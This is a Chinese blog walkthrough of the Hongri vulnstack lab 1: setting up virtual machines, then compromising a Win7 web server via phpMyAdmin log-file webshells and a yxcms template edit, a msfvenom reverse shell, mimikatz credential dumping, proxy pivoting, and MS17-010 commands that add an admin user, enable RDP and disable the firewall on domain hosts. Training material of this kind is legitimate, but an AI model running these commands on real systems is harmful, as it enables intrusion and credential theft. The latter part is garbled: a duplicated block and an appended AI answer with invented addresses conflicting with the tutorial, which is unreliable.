红日靶场1(搭建打靶)

搭建

靶场下载:

http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ (13G,需要百度网盘会员)

下载好靶场文件后直接解压

img

直接用虚拟机打开靶场

img

更改网络ip

img

需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网

将 Win7 的网络适配器 1 设置成 VMnet1 仅主机模式(内网),网络适配器 2 设置成 NAT 模式(外网)
img 而 Win2003、Win2008 网络适配器设置成VMnet1仅主机模式(内网)。

imgimg 网络配置完成,这三台虚拟主机默认开机密码都是 hongrisec@2019(开机提示密码已过期,更改为 hongricse@2024即可,密码太简单会设置错误)

在之后可能会用到桥接模式,可以根据情况设置

在win7把环境启动,其中可以设置一个桥接模式,方便打靶

img查看IP

img

访问192.168.129.158

img这几台机器都是有防火墙的,这里先看一下win7的防火墙和入站规则

img

img

接着可以在外面访问一下192.168.129.158

img

到这里靶场就搭建成功了

开始打靶

攻击机 kali

web服务器 win7

域成员 win2003

域控 win2008

目的:先穿过防火墙打下web服务器接着再穿过防火墙拿下域内的机器(域成员和域控)。

img打靶方法:

  • 端口扫描
  • web路径的发现
  • phpmyadmin渗透

​ 日志导出getshell

  • yxcms渗透

​ 编辑模板getshell

  • 上线msf
  • msf渗透利用
  • msf psexec模板利用
  • ms17_010_command模板利用

打靶

由于在打靶前知道了ip所以直接就不进行信息收集了

直接来扫描端口

nmap -p- 192.168.129.158 -o result.txt/nmap -sV -Pn 192.168.129.158

img有80和3306端口开放

phpmyadmin渗透

访问192.168.129.158:80,得到的是一个phpstudy探针的页面,可以知道绝对路径

img测试一下数据库的连接情况,使用root/root弱口令,连接测试成功

img使用dirsearch工具或者御剑扫描一下存在的web服务

img[08:42:52] 200 - 71KB - /phpinfo.php

[08:42:52] 301 - 242B - /phpMyAdmin -> http://192.168.129.158/phpMyAdmin/

[08:42:52] 301 - 242B - /phpmyadmin -> http://192.168.129.158/phpmyadmin/

[08:42:53] 200 - 32KB - /phpmyadmin/ChangeLog

[08:42:53] 200 - 2KB - /phpmyadmin/README

[08:42:53] 200 - 4KB - /phpmyAdmin/

[08:42:53] 200 - 4KB - /phpMyAdmin/index.php

[08:42:53] 200 - 4KB - /phpMyadmin/

[08:42:53] 200 - 4KB - /phpmyadmin/

[08:42:53] 200 - 4KB - /phpmyadmin/index.php

[08:42:53] 200 - 4KB - /phpMyAdmin/

扫描到这么多文件,接着就是访问

访问 http://192.168.129.158/phpMyAdmin/

img使用刚刚得到的弱口令进行登录root/root

img日志导出getshell

查看日志导出

show variables like ‘general%’;

img发现日志导出没有打开,接着就要开启日志导出

set global general_log=“ON”;

img接着设置web路径

set global general_log_file=“C:/phpStudy/www/404.php”;

img执行select 1;

img访问http://192.168.129.158/404.php查看日志

img接着执行select “<?php phpinfo();?>”;

img接着刷新http://192.168.129.158/404.php查看日志的导出

img以上几步操作说明web是可以用日志导出getshell的

最简单的就是可以写入一句话木马执行,接着就可以用工具(蚁剑)连接到后台,得到文件

yxcms渗透

访问192.168.129.158/yxcms

img查看网页发现用户和密码

img根据网页提示访问得到新的网页

img直接admin/123456登录

成功登录后台

img进入前台模板——>模板管理——>编辑文件

这里可以直接打开编辑写入webshell

img访问http://192.168.129.158/yxcms/protected/apps/default/view/default/info.php 页面什么都没有显示

img使用hackbar,传入刚刚写入的phpinfo

img接着用蚁剑连接

img可以进入文件管理和虚拟终端,在虚拟终端可以看到用户名及身份

imgmsf上线

先进入msf工具使用页面

在kali使用msf工具生成木马文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.129.148 LPORT=4444 -f exe > 11.exe

img成功将木马文件上传到web服务器

img

文件成功在终端显示

img

在kali上开启监听

​ msfconsole #开启msf

​ use exploit/multi/handler

​ set payload windows/meterpreter/reverse_tcp

​ show options #可以查看一下写的内容

​ set lhost 192.168.33.133 #ip写kali的

​ set lport 3333 #监听端口

​ run #启动

设置好kali执行文件,getshell

img

img

内网信息收集

net time /domain #查看时间服务器

net user /domain #查看域用户

net view /domain #查看有几个域

net view /domain:GOD #查看GOD域情况

nslookup 主机名 #查看域内其他主机 可能ip查不出来

net group “domain computers” /domain #查看域内所有的主机名

net group “domain admins” /domain #查看域管理员

net group “domain controllers” /domain #查看域控

获取目标主机的shell

shell #进入模拟终端

chcp 65001 #解决乱码

imgroute print # 打印路由信息

img 可知内网网段应该是 192.168.52.0/24

首先判断是否在域中,域控制器一般集成了DNS服务,通过 ipconfig /all,即可简单判断

img 域名为god.org,还可以使用下面这种方法查看

net view /domain #查询当前主机是否加入域,如果加入则列出域名

img 查看域内信息

net config Workstation #查看计算机名、全名、用户名、系统版本、工作站、域、登录域

img 接着定位域控

img

域控的域名即 owa.god.org ,用 ping 即可反查出域控(server 2008)ip为192.168.52.138

img

再来看一下域内的其它主机,OWA是域控,STU1是win7,所以剩下的就是域成员得到ip为192.168.52.141

img 再来看一下域管理员,可以看到这里我们获得的 Administrator 就是域控OWA的域管理员

net group “domain admins” /domain #查询域管理员

img 看一下域里有几个用户

net user /domain #查看域用户,只有域管才能执行

img

提权

getuid #查看服务器权限

getsystem #提权

getuid #查看是否提权成功

成功得到系统权限

img

获取域用户的密码信息

方法一:加载 kiwi模块

load kiwi #加载kiwi模块

creds_all #列出所有凭据

方法二:加载mimikatz模块,再尝试加载 mimikatz 模块,加载模块前需要先将meterpreter迁移到64位的进程

ps #查看进程

migrate PID

load mimikatz

kiwi_cmd sekurlsa::logonpasswords

方法一不知道为什么一直显示不出来

方法二:

ps

imgimg得到账户及登录密码,密码和我一开始更改的一样

目前为止,获得的内网信息有:

域名:god.org

域内有五个用户:Administrator、Guest、liukaifeng01、ligang、krbtgt

域内三台主机:OWA、ROOT-TVI862UBEH(192.168.52.141)、STU1(win7)

域控:OWA(192.168.52.138)

win7内网ip:192.168.52.143

跨网段横向渗透

msf添加代理

添加路由

run autoroute -s 192.168.52.0/24 #添加路由

run autoroute -p #查看路由信息

img

配置代理

background

use auxiliary/server/socks_proxy

set SRVHOST 127.0.0.1(这里因为是本机可以写本地ip)

run

jobs

imgimg
然后在 proxychains 的配置文件 /etc/proxychains.conf,添加本机的1080端口:

socks4 127.0.0.1 1080

域成员渗透

首先看下域成员开放的端口,全扫很久,这里只扫描一些高危端口

proxychains nmap -sV -Pn -p 22,80,135,443,445,3389 192.168.52.141

img

这里看见开着445端口,试着用一下ms17_010

use auxiliary/admin/smb/ms17_010_command

set COMMAND net user

set RHOST 192.168.52.141

run

img

添加一个用户尝试远程登录一下

还是使用这个模块,依次执行下面命令

set command net user bbb qwer@123 /add #添加用户

run

set command net localgroup administrators bbb /add #管理员权限

run

set command ‘REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f’ #开启3389端口

run

set command netsh advfirewall set allprofiles state off #关闭防火墙

run

imgimgimg接着远程登录

proxychains rdesktop 192.168.52.141

使用刚刚添加的新用户进行登录,而且原来的用户账户及密码也拿到了

对于另一台机器192.168.52.138的获取也是一样的操作

先连接创建新用户,赋予其权限

Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f’ #开启3389端口

run

set command netsh advfirewall set allprofiles state off #关闭防火墙

run

[外链图片转存中…(img-DoUuluZW-1734439783074)][外链图片转存中…(img-pquuSHzj-1734439783074)][外链图片转存中…(img-QvoP0AOc-1734439783074)]接着远程登录

proxychains rdesktop 192.168.52.141

使用刚刚添加的新用户进行登录,而且原来的用户账户及密码也拿到了

对于另一台机器192.168.52.138的获取也是一样的操作

先连接创建新用户,赋予其权限

然后直接远程登录

<think>好的,用户想了解如何搭建红日靶场的环境,需要教程和配置指南。我需要根据提供的引用信息来整理步骤。首先,引用[1]和[2]提到了红日靶场的官网和配置说明,应该从这里获取官方资料。引用[3]中的内容详细描述了靶场搭建的拓扑图、网络配置,以及外网打点的步骤,比如nmap扫描、目录扫描、利用phpmyadmin日志getshell等。引用[4]提供了一个超详细的操作指南,适合新手,可能包含具体的虚拟机设置和权限配置,比如关闭Win7防火墙、黄金票据的制作问题。此外,用户可能需要知道环境搭建后的内网攻击步骤,如ms17_010漏洞扫描和利用。 需要注意的是,引用[3]中的目录结构可能对应不同的阶段,比如外网渗透、内网信息搜集、横向移动等,但用户现在需要的是环境搭建部分。所以应该聚焦在拓扑图配置、网络设置、虚拟机安装等方面。引用[4]提到制作黄金票据后访问域控的问题,虽然属于后期渗透测试的内容,但环境搭建时需要正确配置域控权限和网络策略,避免出现访问问题。 另外,用户可能对虚拟机软件的选择(如VMware或VirtualBox)、镜像导入、网络适配器配置(如NAT、仅主机模式)有疑问,需要详细说明。引用[3]中的“配置网络”可能涉及设置多个虚拟机的IP地址,确保它们在同一子网内,并正确隔离内外网环境。可能还需要关闭防火墙(如Win7防火墙)以便测试,如引用[4]所述。 需要提醒用户注意版权问题,确保从官网下载资源,避免使用非官方镜像。同时,步骤中可能涉及复杂的内网渗透配置,建议分阶段验证,例如先确保各虚拟机互通,再测试外网到内网的连通性。可能遇到的常见问题包括网络不通、服务未启动、权限配置错误等,需提供排查方法,比如检查IP设置、服务状态、防火墙规则等。 最后,根据引用[5],可能有培训课程提供更深入的指导,但用户目前只需基础搭建步骤。因此,回答应结构清晰,分步骤说明,并附上相关引用来源,确保信息可靠。需要检查是否有遗漏的关键点,如虚拟机快照管理、必要的软件安装(如phpMyAdmin、XSS平台等),以及后续测试的基本流程概述,帮助用户搭建后验证环境是否成功。</think>### 红日靶场环境搭建指南 #### 1. **环境准备** - **官网资源下载** 访问红日靶场官网[^2]获取镜像文件(如Windows Server、Win7等虚拟机镜像)及拓扑图。建议使用VMware Workstation或VirtualBox作为虚拟化平台。 - **网络拓扑理解** 根据引用[3]中的靶场拓扑图,配置内外网隔离环境。典型结构包含外网WEB服务器、内网域控服务器(DC)和多个内网主机,需设置NAT和仅主机模式网卡实现网络分层。 #### 2. **虚拟机配置** - **镜像导入与网络适配** 将下载的OVA/OVF镜像导入虚拟机软件,为每台虚拟机分配网络适配器: - **WEB服务器**:外网网卡(NAT模式) + 内网网卡(仅主机模式) - **内网主机(如Win7)**:仅主机模式网卡 - **域控服务器(DC)**:仅主机模式网卡 - **IP地址设置** 根据拓扑图手动配置静态IP,确保内外网互通。例如: - WEB服务器外网IP:`192.168.1.100`,内网IP:`10.10.10.2` - 域控服务器IP:`10.10.10.1` - Win7主机IP:`10.10.10.3` #### 3. **服务与权限配置** - **关闭防火墙** 在Win7和域控服务器中关闭系统防火墙(引用[4]),避免拦截测试流量: ```cmd netsh advfirewall set allprofiles state off ``` - **域环境搭建** 在域控服务器安装Active Directory服务,创建测试域(如`test.local`),将Win7主机加入域。确保域账户权限正常,用于后续黄金票据测试[^4]。 #### 4. **漏洞环境验证** - **外网渗透测试** 使用Kali Linux对WEB服务器进行扫描(引用[3]): ```bash nmap -sV 192.168.1.100 dirsearch -u http://192.168.1.100 -e php,asp ``` - **内网连通性检查** 从WEB服务器通过内网IP访问域控共享目录,验证网络隔离是否生效: ```cmd dir \\10.10.10.1\C$ ``` #### 5. **常见问题解决** - **网络不通** 检查虚拟机网卡模式、IP地址是否冲突,确保网关和DNS设置正确。 - **权限访问失败** 若黄金票据制作后仍无法访问域控(引用[4]),需检查Kerberos票据有效期、系统时间同步及SPN配置。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值